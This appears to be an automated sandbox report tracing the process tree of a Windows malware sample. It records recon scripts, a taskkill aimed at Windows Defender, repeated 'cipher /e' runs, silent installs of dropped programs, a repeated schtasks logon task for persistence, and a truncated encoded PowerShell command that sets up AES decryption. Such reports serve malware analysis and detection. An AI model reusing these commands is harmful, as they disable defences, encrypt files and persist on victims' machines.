PID 572 wrote to memory of 2932	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 2932	572	cmd.exe	xcopy.exe
PID 572 wrote to memory of 2932	572	cmd.exe	xcopy.exe
PID 2040 wrote to memory of 2928	2040	cmd.exe	net.exe
PID 2040 wrote to memory of 2928	2040	cmd.exe	net.exe
PID 2040 wrote to memory of 2928	2040	cmd.exe	net.exe
PID 2040 wrote to memory of 2928	2040	cmd.exe	net.exe
PID 2928 wrote to memory of 2936	2928	net.exe	net1.exe
PID 2928 wrote to memory of 2936	2928	net.exe	net1.exe
PID 2928 wrote to memory of 2936	2928	net.exe	net1.exe
PID 2928 wrote to memory of 2936	2928	net.exe	net1.exe
PID 2040 wrote to memory of 1496	2040	cmd.exe	tasklist.exe
PID 2040 wrote to memory of 1496	2040	cmd.exe	tasklist.exe
PID 2040 wrote to memory of 1496	2040	cmd.exe	tasklist.exe
PID 2040 wrote to memory of 1496	2040	cmd.exe	tasklist.exe
PID 2632 wrote to memory of 2120	2632	cmd.exe	taskkill.exe
PID 2632 wrote to memory of 2120	2632	cmd.exe	taskkill.exe
PID 2632 wrote to memory of 2120	2632	cmd.exe	taskkill.exe
PID 2632 wrote to memory of 2120	2632	cmd.exe	taskkill.exe
PID 2632 wrote to memory of 1740	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 1740	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 1740	2632	cmd.exe	cmd.exe
PID 2632 wrote to memory of 1740	2632	cmd.exe	cmd.exe
PID 2752 wrote to memory of 2812	2752	iexplore.exe	IEXPLORE.EXE
PID 2752 wrote to memory of 2812	2752	iexplore.exe	IEXPLORE.EXE
PID 2752 wrote to memory of 2812	2752	iexplore.exe	IEXPLORE.EXE
PID 2752 wrote to memory of 2812	2752	iexplore.exe	IEXPLORE.EXE

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\vir.exe
"C:\Users\Admin\AppData\Local\Temp\vir.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\!main.cmd" "
  2⤵
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K spread.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:572
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy 1 C:\Users\Admin\Desktop
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:2452
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy 2 C:\Users\Admin\Desktop
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:1260
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy 3 C:\Users\Admin\
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K doxx.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2040
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig
      4⤵
      System Location Discovery: System Language Discovery
      Gathers network information
      PID:296
  - - C:\Windows\SysWOW64\net.exe
      net accounts
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:616
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2732
  - - C:\Windows\SysWOW64\net.exe
      net user
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2928
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2936
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /apps /v /fo table
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1496
- - C:\Windows\SysWOW64\PING.EXE
    ping google.com -t -n 1 -s 4 -4
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im WindowsDefender.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K handler.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K cipher.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2896
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      System Location Discovery: System Language Discovery
      PID:268
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      System Location Discovery: System Language Discovery
      PID:3280
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      System Location Discovery: System Language Discovery
      PID:3948
  - - C:\Windows\SysWOW64\cipher.exe
      cipher /e
      4⤵
      System Location Discovery: System Language Discovery
      PID:3972
- - C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\Rover.exe
    Rover.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2904
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\web.htm
    3⤵
    - Manipulates Digital Signatures
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    PID:1140
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:404
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1140 CREDAT:209925 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2120
- - C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\Google.exe
    Google.exe
    3⤵
    - Executes dropped EXE
    PID:2256
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\helper.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2916
- - C:\Windows\SysWOW64\PING.EXE
    ping google.com -t -n 1 -s 4 -4
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2932
- - C:\Windows\SysWOW64\PING.EXE
    ping mrbeast.codes -t -n 1 -s 4 -4
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3820
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy Google.exe C:\Users\Admin\Desktop
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:4060
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy Rover.exe C:\Users\Admin\Desktop
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:4068
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy spinner.gif C:\Users\Admin\Desktop
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:4076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K bloatware.cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\bloatware\1.exe
      1.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:872
  - - C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\bloatware\3.exe
      3.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:2744
    - - C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
        
        C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:1264
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0wOC0xNVQyMzoxNzoyMS4xMThaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ
        5⤵
        
        PID:1640
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\bloatware\2.hta"
      4⤵
      Blocklisted process makes network request
      System Location Discovery: System Language Discovery
      PID:2000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /K SilentSetup.cmd
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1940
    - - C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe
        
        WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3204
      - C:\Users\Admin\AppData\Local\Temp\is-3NCSB.tmp\WinaeroTweaker-1.40.0.0-setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3NCSB.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$10310,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:3624
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2332
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im winaerotweaker.exe /f
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1548
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im winaerotweakerhelper.exe /f
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
- - C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\regmess.exe
    regmess.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4092
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_31c5bda5-92be-4e65-a405-a9a757f62a9f\regmess.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:3136
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Setup.reg /reg:32
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3220
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Console.reg /reg:32
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3236
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Desktop.reg /reg:32
        5⤵
        Sets desktop wallpaper using registry
        System Location Discovery: System Language Discovery
        
        PID:3244
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import International.reg /reg:32
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2056
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Fonts.reg /reg:32
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2316
    - - C:\Windows\SysWOW64\reg.exe
        
        reg import Cursors.reg /reg:32
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1692
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 10
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:1680
- - C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\scary.exe
    scary.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    PID:3920
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3180
  - - C:\Program Files\SubDir\Romilyaa.exe
      "C:\Program Files\SubDir\Romilyaa.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      PID:2780
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2768
    - - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\cBxx4szsfhqy.bat" "
        5⤵
        
        PID:2568
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:3348
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:968
      - C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:2540
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1188
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\vs3jKnqpUhjN.bat" "
        7⤵
        
        PID:1724
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2380
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1388
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:1472
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2936
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7fIwvoIcsp5N.bat" "
        9⤵
        
        PID:2084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:3136
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2640
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:1096
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2888
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\hnsO3nUPvYCx.bat" "
        11⤵
        
        PID:2580
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:2576
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3412
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:1092
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3284
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\t2agIntX6oTC.bat" "
        13⤵
        
        PID:2080
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:2432
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1028
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:2928
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2036
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\8qQOOnEeFudr.bat" "
        15⤵
        
        PID:3280
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:1452
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2500
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3048
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1960
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\ofpt9fmLYalZ.bat" "
        17⤵
        
        PID:3024
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:1052
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2144
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3152
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2784
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\8q74v3C0zDDR.bat" "
        19⤵
        
        PID:2484
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:464
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3124
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3780
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3040
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\X0Fd3xdzSRur.bat" "
        21⤵
        
        PID:2604
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:2020
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3460
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3392
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1044
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\O4JDI6vMNfRM.bat" "
        23⤵
        
        PID:3512
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        24⤵
        
        PID:3976
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2104
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:3236
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1064
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\2vVRQHeHAAD8.bat" "
        25⤵
        
        PID:2356
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        26⤵
        
        PID:4072
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2384
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:440
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2656
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\KgvlHy4lzptE.bat" "
        27⤵
        
        PID:2672
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        28⤵
        
        PID:2368
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2560
        
        C:\Program Files\SubDir\Romilyaa.exe
        
        "C:\Program Files\SubDir\Romilyaa.exe"
        28⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556
- - C:\Users\Admin\AppData\Local\Temp\vir_03e8dbd4-d1c8-410e-bd68-2405504fea82\the.exe
    the.exe
    3⤵
    - Executes dropped EXE
    PID:3980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAI